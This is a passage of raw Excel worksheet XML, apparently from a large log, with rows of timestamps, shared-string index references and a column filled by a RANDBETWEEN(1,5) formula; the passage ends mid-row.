    <row r="20109" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20109" s="1">
        <v>43124.503287037034</v>
      </c>
      <c r="C20109" t="s">
        <v>10</v>
      </c>
      <c r="D20109" t="s">
        <v>6</v>
      </c>
      <c r="E20109" s="2" t="s">
        <v>18067</v>
      </c>
      <c r="F20109">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20110" s="1">
        <v>43124.499525462961</v>
      </c>
      <c r="C20110" t="s">
        <v>10</v>
      </c>
      <c r="D20110" t="s">
        <v>36</v>
      </c>
      <c r="E20110" t="s">
        <v>18068</v>
      </c>
      <c r="F20110">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20111" s="1">
        <v>43124.498287037037</v>
      </c>
      <c r="C20111" t="s">
        <v>10</v>
      </c>
      <c r="D20111" t="s">
        <v>6</v>
      </c>
      <c r="E20111" t="s">
        <v>18069</v>
      </c>
      <c r="F20111">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20112" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20112" s="1">
        <v>43124.496944444443</v>
      </c>
      <c r="C20112" t="s">
        <v>189</v>
      </c>
      <c r="E20112" s="2" t="s">
        <v>18070</v>
      </c>
      <c r="F20112">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20113" s="1">
        <v>43124.460636574076</v>
      </c>
      <c r="C20113" t="s">
        <v>107</v>
      </c>
      <c r="E20113" t="s">
        <v>18071</v>
      </c>
      <c r="F20113">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20114" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20114" s="1">
        <v>43124.458483796298</v>
      </c>
      <c r="C20114" t="s">
        <v>7491</v>
      </c>
      <c r="D20114" t="s">
        <v>112</v>
      </c>
      <c r="E20114" s="2" t="s">
        <v>18072</v>
      </c>
      <c r="F20114">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20115" s="1">
        <v>43124.447210648148</v>
      </c>
      <c r="C20115" t="s">
        <v>10</v>
      </c>
      <c r="D20115" t="s">
        <v>80</v>
      </c>
      <c r="E20115" t="s">
        <v>18073</v>
      </c>
      <c r="F20115">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20116" s="1">
        <v>43124.444791666669</v>
      </c>
      <c r="C20116" t="s">
        <v>71</v>
      </c>
      <c r="E20116" t="s">
        <v>18074</v>
      </c>
      <c r="F20116">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20117" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20117" s="1">
        <v>43124.444722222222</v>
      </c>
      <c r="C20117" t="s">
        <v>16</v>
      </c>
      <c r="E20117" s="2" t="s">
        <v>18075</v>
      </c>
      <c r="F20117">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20118" s="1">
        <v>43124.444305555553</v>
      </c>
      <c r="C20118" t="s">
        <v>6</v>
      </c>
      <c r="D20118" t="s">
        <v>25</v>
      </c>
      <c r="E20118" t="s">
        <v>18076</v>
      </c>
      <c r="F20118">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20119" s="1">
        <v>43124.438680555555</v>
      </c>
      <c r="C20119" t="s">
        <v>10</v>
      </c>
      <c r="D20119" t="s">
        <v>41</v>
      </c>
      <c r="E20119" t="s">
        <v>18077</v>
      </c>
      <c r="F20119">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20120" s="1">
        <v>43124.438645833332</v>
      </c>
      <c r="C20120" t="s">
        <v>6</v>
      </c>
      <c r="D20120" t="s">
        <v>25</v>
      </c>
      <c r="E20120" t="s">
        <v>18078</v>
      </c>
      <c r="F20120">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20121" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20121" s="1">
        <v>43124.436967592592</v>
      </c>
      <c r="C20121" t="s">
        <v>10</v>
      </c>
      <c r="D20121" t="s">
        <v>89</v>
      </c>
      <c r="E20121" s="2" t="s">
        <v>18079</v>
      </c>
      <c r="F20121">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20122" s="1">
        <v>43124.433900462966</v>
      </c>
      <c r="C20122" t="s">
        <v>10</v>
      </c>
      <c r="D20122" t="s">
        <v>112</v>
      </c>
      <c r="E20122" t="s">
        <v>18080</v>
      </c>
      <c r="F20122">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20123" s="1">
        <v>43124.431192129632</v>
      </c>
      <c r="C20123" t="s">
        <v>10</v>
      </c>
      <c r="D20123" t="s">
        <v>192</v>
      </c>
      <c r="E20123" t="s">
        <v>18081</v>
      </c>
      <c r="F20123">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20124" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20124" s="1">
        <v>43124.418657407405</v>
      </c>
      <c r="C20124" t="s">
        <v>82</v>
      </c>
      <c r="E20124" s="2" t="s">
        <v>18082</v>
      </c>
      <c r="F20124">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20125" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20125" s="1">
        <v>43124.411643518521</v>
      </c>
      <c r="C20125" t="s">
        <v>124</v>
      </c>
      <c r="E20125" s="2" t="s">
        <v>18083</v>
      </c>
      <c r="F20125">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20126" s="1">
        <v>43124.409386574072</v>
      </c>
      <c r="C20126" t="s">
        <v>65</v>
      </c>
      <c r="E20126" t="s">
        <v>18084</v>
      </c>
      <c r="F20126">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20127" s="1">
        <v>43124.395902777775</v>
      </c>
      <c r="C20127" t="s">
        <v>50</v>
      </c>
      <c r="E20127" t="s">
        <v>18085</v>
      </c>
      <c r="F20127">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20128" s="1">
        <v>43124.382233796299</v>
      </c>
      <c r="C20128" t="s">
        <v>6</v>
      </c>
      <c r="D20128" t="s">
        <v>25</v>
      </c>
      <c r="E20128" t="s">
        <v>18086</v>
      </c>
      <c r="F20128">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20129" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20129" s="1">
        <v>43124.381712962961</v>
      </c>
      <c r="C20129" t="s">
        <v>10</v>
      </c>
      <c r="D20129" t="s">
        <v>11</v>
      </c>
      <c r="E20129" s="2" t="s">
        <v>18087</v>
      </c>
      <c r="F20129">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20130" s="1">
        <v>43124.369745370372</v>
      </c>
      <c r="C20130" t="s">
        <v>10</v>
      </c>
      <c r="D20130" t="s">
        <v>271</v>
      </c>
      <c r="E20130" t="s">
        <v>18088</v>
      </c>
      <c r="F20130">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20131" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20131" s="1">
        <v>43124.364039351851</v>
      </c>
      <c r="C20131" t="s">
        <v>65</v>
      </c>
      <c r="E20131" s="2" t="s">
        <v>18089</v>
      </c>
      <c r="F20131">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20132" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20132" s="1">
        <v>43124.336851851855</v>
      </c>
      <c r="C20132" t="s">
        <v>17</v>
      </c>
      <c r="E20132" s="2" t="s">
        <v>18090</v>
      </c>
      <c r="F20132">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20133" s="1">
        <v>43124.328263888892</v>
      </c>
      <c r="C20133" t="s">
        <v>41</v>
      </c>
      <c r="E20133" t="s">
        <v>18091</v>
      </c>
      <c r="F20133">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20134" s="1">
        <v>43124.292280092595</v>
      </c>
      <c r="C20134" t="s">
        <v>63</v>
      </c>
      <c r="E20134" t="s">
        <v>18092</v>
      </c>
      <c r="F20134">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20135" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20135" s="1">
        <v>43124.26525462963</v>
      </c>
      <c r="C20135" t="s">
        <v>16</v>
      </c>
      <c r="E20135" s="2" t="s">
        <v>18093</v>
      </c>
      <c r="F20135">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20136" s="1">
        <v>43124.264837962961</v>
      </c>
      <c r="C20136" t="s">
        <v>16</v>
      </c>
      <c r="E20136" t="s">
        <v>18094</v>
      </c>
      <c r="F20136">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20137" s="1">
        <v>43124.262372685182</v>
      </c>
      <c r="C20137" t="s">
        <v>724</v>
      </c>
      <c r="E20137" t="s">
        <v>18095</v>
      </c>
      <c r="F20137">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20138" s="1">
        <v>43124.247719907406</v>
      </c>
      <c r="C20138" t="s">
        <v>197</v>
      </c>
      <c r="E20138" t="s">
        <v>18096</v>
      </c>
      <c r="F20138">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20139" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20139" s="1">
        <v>43124.24622685185</v>
      </c>
      <c r="C20139" t="s">
        <v>318</v>
      </c>
      <c r="E20139" s="2" t="s">
        <v>18097</v>
      </c>
      <c r="F20139">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20140" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20140" s="1">
        <v>43124.225486111114</v>
      </c>
      <c r="C20140" t="s">
        <v>48</v>
      </c>
      <c r="E20140" s="2" t="s">
        <v>18098</v>
      </c>
      <c r="F20140">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20141" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20141" s="1">
        <v>43124.218310185184</v>
      </c>
      <c r="C20141" t="s">
        <v>140</v>
      </c>
      <c r="D20141" t="s">
        <v>46</v>
      </c>
      <c r="E20141" s="2" t="s">
        <v>18099</v>
      </c>
      <c r="F20141">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20142" s="1">
        <v>43124.215763888889</v>
      </c>
      <c r="C20142" t="s">
        <v>10</v>
      </c>
      <c r="D20142" t="s">
        <v>151</v>
      </c>
      <c r="E20142" t="s">
        <v>18100</v>
      </c>
      <c r="F20142">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20143" s="1">
        <v>43124.215763888889</v>
      </c>
      <c r="C20143" t="s">
        <v>10</v>
      </c>
      <c r="D20143" t="s">
        <v>151</v>
      </c>
      <c r="E20143" t="s">
        <v>18100</v>
      </c>
      <c r="F20143">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20144" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20144" s="1">
        <v>43124.213854166665</v>
      </c>
      <c r="C20144" t="s">
        <v>41</v>
      </c>
      <c r="E20144" s="2" t="s">
        <v>18101</v>
      </c>
      <c r="F20144">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20145" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20145" s="1">
        <v>43124.211631944447</v>
      </c>
      <c r="C20145" t="s">
        <v>69</v>
      </c>
      <c r="E20145" s="2" t="s">
        <v>18102</v>
      </c>
      <c r="F20145">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20146" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20146" s="1">
        <v>43124.188703703701</v>
      </c>
      <c r="C20146" t="s">
        <v>41</v>
      </c>
      <c r="E20146" s="2" t="s">
        <v>18103</v>
      </c>
      <c r="F20146">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20147" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20147" s="1">
        <v>43124.176481481481</v>
      </c>
      <c r="C20147" t="s">
        <v>724</v>
      </c>
      <c r="E20147" s="2" t="s">
        <v>18104</v>
      </c>
      <c r="F20147">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20148" s="1">
        <v>43124.169606481482</v>
      </c>
      <c r="C20148" t="s">
        <v>48</v>
      </c>
      <c r="E20148" t="s">
        <v>18105</v>
      </c>
      <c r="F20148">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20149" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20149" s="1">
        <v>43124.129236111112</v>
      </c>
      <c r="C20149" t="s">
        <v>410</v>
      </c>
      <c r="E20149" s="2" t="s">
        <v>18106</v>
      </c>
      <c r="F20149">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20150" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20150" s="1">
        <v>43124.121608796297</v>
      </c>
      <c r="C20150" t="s">
        <v>41</v>
      </c>
      <c r="E20150" s="2" t="s">
        <v>18107</v>
      </c>
      <c r="F20150">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20151" s="1">
        <v>43123.987164351849</v>
      </c>
      <c r="C20151" t="s">
        <v>314</v>
      </c>
      <c r="E20151" t="s">
        <v>18108</v>
      </c>
      <c r="F20151">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20152" s="1">
        <v>43123.920428240737</v>
      </c>
      <c r="C20152" t="s">
        <v>10</v>
      </c>
      <c r="D20152" t="s">
        <v>46</v>
      </c>
      <c r="F20152">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20153" s="1">
        <v>43123.855254629627</v>
      </c>
      <c r="C20153" t="s">
        <v>6</v>
      </c>
      <c r="D20153" t="s">
        <v>194</v>
      </c>
      <c r="E20153" t="s">
        <v>18109</v>
      </c>
      <c r="F20153">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20154" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20154" s="1">
        <v>43123.761423611111</v>
      </c>
      <c r="C20154" t="s">
        <v>10</v>
      </c>
      <c r="D20154" t="s">
        <v>163</v>
      </c>
      <c r="E20154" s="2" t="s">
        <v>18110</v>
      </c>
      <c r="F20154">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20155" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A20155" s="1">
        <v>43123.729525462964</v>
      </c>
      <c r="C20155" t="s">
        <v>71</v>
      </c>
      <c r="E20155" s="2" t="s">
        <v>18111</v>
      </c>
      <c r="F20155">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20156" s="1">
        <v>43123.709270833337</v>
      </c>
      <c r="C20156" t="s">
        <v>10</v>
      </c>
      <c r="D20156" t="s">
        <v>36</v>
      </c>
      <c r="E20156" t="s">
        <v>18112</v>
      </c>
      <c r="F20156">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20157" s="1">
        <v>43123.706203703703</v>
      </c>
      <c r="C20157" t="s">
        <v>10</v>
      </c>
      <c r="D20157" t="s">
        <v>381</v>
      </c>
      <c r="E20157" t="s">
        <v>18113</v>
      </c>
      <c r="F20157">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20158" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20158" s="1">
        <v>43123.69190972222</v>
      </c>
      <c r="C20158" t="s">
        <v>10</v>
      </c>
      <c r="D20158" t="s">
        <v>80</v>
      </c>
      <c r="E20158" t="s">
        <v>16335</v>
      </c>
      <c r="F20158">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20159" s="1">
        <v>43123.684641203705</v>
      </c>
      <c r="C20159" t="s">
        <v>10</v>
      </c>
      <c r="D20159" t="s">
        <v>80</v>
      </c>
      <c r="E20159" t="s">
        <v>18114</v>
      </c>
      <c r="F20159">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20160" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20160" s="1">
        <v>43123.66002314815</v>
      </c>
      <c r="C20160" t="s">
        <v>71</v>
      </c>
      <c r="E20160" s="2" t="s">
        <v>18115</v>
      </c>
      <c r="F20160">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20161" s="1">
        <v>43123.65048611111</v>
      </c>
      <c r="C20161" t="s">
        <v>10</v>
      </c>
      <c r="D20161" t="s">
        <v>6</v>
      </c>
      <c r="E20161" t="s">
        <v>18116</v>
      </c>
      <c r="F20161">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20162" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20162" s="1">
        <v>43123.646631944444</v>
      </c>
      <c r="C20162" t="s">
        <v>6</v>
      </c>
      <c r="D20162" t="s">
        <v>25</v>
      </c>
      <c r="E20162" s="2" t="s">
        <v>18117</v>
      </c>
      <c r="F20162">
        <f t="shared" ref="F20162:F20225" ca="1" si="315">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="20163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20163" s="1">
        <v>43123.615254629629</v>
      </c>
      <c r="C20163" t="s">
        <v>10</v>
      </c>
      <c r="D20163" t="s">
        <v>494</v>
      </c>
      <c r="E20163" t="s">
        <v>18118</v>
      </c>
      <c r="F20163">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20164" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20164" s="1">
        <v>43123.611956018518</v>
      </c>
      <c r="C20164" t="s">
        <v>6</v>
      </c>
      <c r="D20164" t="s">
        <v>25</v>
      </c>
      <c r="E20164" s="2" t="s">
        <v>18119</v>
      </c>
      <c r="F20164">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20165" s="1">
        <v>43123.603182870371</v>
      </c>
      <c r="C20165" t="s">
        <v>10</v>
      </c>
      <c r="D20165" t="s">
        <v>46</v>
      </c>
      <c r="E20165" t="s">
        <v>18120</v>
      </c>
      <c r="F20165">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20166" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20166" s="1">
        <v>43123.597488425927</v>
      </c>
      <c r="C20166" t="s">
        <v>10</v>
      </c>
      <c r="D20166" t="s">
        <v>36</v>
      </c>
      <c r="E20166" s="2" t="s">
        <v>18121</v>
      </c>
      <c r="F20166">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20167" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20167" s="1">
        <v>43123.578819444447</v>
      </c>
      <c r="C20167" t="s">
        <v>41</v>
      </c>
      <c r="E20167" s="2" t="s">
        <v>18122</v>
      </c>
      <c r="F20167">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20168" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20168" s="1">
        <v>43123.568993055553</v>
      </c>
      <c r="C20168" t="s">
        <v>10</v>
      </c>
      <c r="D20168" t="s">
        <v>112</v>
      </c>
      <c r="E20168" s="2" t="s">
        <v>18123</v>
      </c>
      <c r="F20168">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20169" s="1">
        <v>43123.562210648146</v>
      </c>
      <c r="C20169" t="s">
        <v>10</v>
      </c>
      <c r="D20169" t="s">
        <v>56</v>
      </c>
      <c r="E20169" t="s">
        <v>18124</v>
      </c>
      <c r="F20169">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20170" s="1">
        <v>43123.554351851853</v>
      </c>
      <c r="C20170" t="s">
        <v>10</v>
      </c>
      <c r="D20170" t="s">
        <v>86</v>
      </c>
      <c r="E20170" t="s">
        <v>18125</v>
      </c>
      <c r="F20170">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20171" s="1">
        <v>43123.546886574077</v>
      </c>
      <c r="C20171" t="s">
        <v>10</v>
      </c>
      <c r="D20171" t="s">
        <v>46</v>
      </c>
      <c r="E20171" t="s">
        <v>18126</v>
      </c>
      <c r="F20171">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20172" s="1">
        <v>43123.523854166669</v>
      </c>
      <c r="C20172" t="s">
        <v>10</v>
      </c>
      <c r="D20172" t="s">
        <v>86</v>
      </c>
      <c r="E20172" t="s">
        <v>18127</v>
      </c>
      <c r="F20172">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20173" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A20173" s="1">
        <v>43123.505902777775</v>
      </c>
      <c r="C20173" t="s">
        <v>10</v>
      </c>
      <c r="D20173" t="s">
        <v>6</v>
      </c>
      <c r="E20173" s="2" t="s">
        <v>18128</v>
      </c>
      <c r="F20173">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20174" s="1">
        <v>43123.503657407404</v>
      </c>
      <c r="C20174" t="s">
        <v>10</v>
      </c>
      <c r="D20174" t="s">
        <v>494</v>
      </c>
      <c r="E20174" t="s">
        <v>18129</v>
      </c>
      <c r="F20174">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20175" s="1">
        <v>43123.482291666667</v>
      </c>
      <c r="C20175" t="s">
        <v>10</v>
      </c>
      <c r="D20175" t="s">
        <v>163</v>
      </c>
      <c r="E20175" t="s">
        <v>18130</v>
      </c>
      <c r="F20175">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20176" s="1">
        <v>43123.482199074075</v>
      </c>
      <c r="C20176" t="s">
        <v>10</v>
      </c>
      <c r="D20176" t="s">
        <v>163</v>
      </c>
      <c r="E20176" t="s">
        <v>18130</v>
      </c>
      <c r="F20176">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20177" s="1">
        <v>43123.482094907406</v>
      </c>
      <c r="C20177" t="s">
        <v>10</v>
      </c>
      <c r="D20177" t="s">
        <v>178</v>
      </c>
      <c r="E20177" t="s">
        <v>18131</v>
      </c>
      <c r="F20177">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20178" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20178" s="1">
        <v>43123.478668981479</v>
      </c>
      <c r="C20178" t="s">
        <v>260</v>
      </c>
      <c r="E20178" s="2" t="s">
        <v>18132</v>
      </c>
      <c r="F20178">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20179" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20179" s="1">
        <v>43123.465057870373</v>
      </c>
      <c r="C20179" t="s">
        <v>107</v>
      </c>
      <c r="E20179" s="2" t="s">
        <v>18133</v>
      </c>
      <c r="F20179">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20180" s="1">
        <v>43123.447974537034</v>
      </c>
      <c r="C20180" t="s">
        <v>60</v>
      </c>
      <c r="E20180" t="s">
        <v>18134</v>
      </c>
      <c r="F20180">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20181" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20181" s="1">
        <v>43123.431331018517</v>
      </c>
      <c r="C20181" t="s">
        <v>10</v>
      </c>
      <c r="D20181" t="s">
        <v>89</v>
      </c>
      <c r="E20181" s="2" t="s">
        <v>18135</v>
      </c>
      <c r="F20181">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20182" s="1">
        <v>43123.417361111111</v>
      </c>
      <c r="C20182" t="s">
        <v>16</v>
      </c>
      <c r="E20182" t="s">
        <v>18136</v>
      </c>
      <c r="F20182">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20183" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20183" s="1">
        <v>43123.392488425925</v>
      </c>
      <c r="C20183" t="s">
        <v>65</v>
      </c>
      <c r="E20183" s="2" t="s">
        <v>18137</v>
      </c>
      <c r="F20183">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20184" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20184" s="1">
        <v>43123.390057870369</v>
      </c>
      <c r="C20184" t="s">
        <v>48</v>
      </c>
      <c r="E20184" s="2" t="s">
        <v>18138</v>
      </c>
      <c r="F20184">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20185" s="1">
        <v>43123.383796296293</v>
      </c>
      <c r="C20185" t="s">
        <v>10</v>
      </c>
      <c r="D20185" t="s">
        <v>192</v>
      </c>
      <c r="E20185" t="s">
        <v>18139</v>
      </c>
      <c r="F20185">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20186" s="1">
        <v>43123.383263888885</v>
      </c>
      <c r="C20186" t="s">
        <v>60</v>
      </c>
      <c r="E20186" t="s">
        <v>18140</v>
      </c>
      <c r="F20186">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20187" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20187" s="1">
        <v>43123.380879629629</v>
      </c>
      <c r="C20187" t="s">
        <v>10</v>
      </c>
      <c r="D20187" t="s">
        <v>112</v>
      </c>
      <c r="E20187" s="2" t="s">
        <v>18141</v>
      </c>
      <c r="F20187">
